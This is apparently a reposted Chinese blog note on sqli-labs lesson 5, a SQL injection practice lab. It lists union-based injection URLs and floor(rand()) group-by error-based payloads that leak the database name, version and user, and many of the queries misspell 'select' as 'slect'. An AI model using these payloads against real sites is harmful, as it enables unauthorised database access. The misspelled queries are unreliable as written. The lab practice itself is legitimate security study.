zoukankan      html  css  js  c++  java
  • sqlilabs 5

    第一个1不断返回true,2可以进行更改
    ?id=-1' union select 1,2,3 and '1
    ?id=-1' union select 1,2,3 and 1='1

    ?id=-1' union select 1,@@datadir,3 and '1
    @@datadir可以替换为 current_user,database() etc..

    select rand();
    select foor();

    select table_name,table_schema from information_schema.tables group by table_schema;

    select database();
    slect(select database());
    slect concat (select database());
    slect concat (0x3a,0x3a,select database(),0x3a,0x3a);
    slect concat (0x3a,0x3a,select database(),0x3a,0x3a,floor(rand()*2))a;
    slect concat (0x3a,0x3a,select database(),0x3a,0x3a,floor(rand()*2))a from information_schema.columns;
    slect concat (0x3a,0x3a,select database(),0x3a,0x3a,floor(rand()*2))a from information_schema.tables;
    slect count(*), concat (0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.tables;
    slect count(*), concat (0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a;
    slect count(*), concat (0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;
    slect count(*), concat (0x3a,0x3a,(select version()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;
    slect count(*), concat (0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;
    slect count(*), concat (0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;

  • 相关阅读:
    JavaSE:和网络相关的协议
    随机产生四位,任意位或者范围数字方法
    随机产生四位,任意位或者范围数字方法
    如何保留小数精度
    如何保留小数精度
    JDK开发环境搭建及环境变量配置详细教程
    JDK开发环境搭建及环境变量配置详细教程
    排序算法
    html中a标签如何设置行宽高
    MyEclipse10破解详细说明
  • 原文地址:https://www.cnblogs.com/CMlhc/p/8858973.html
Copyright © 2011-2022 走看看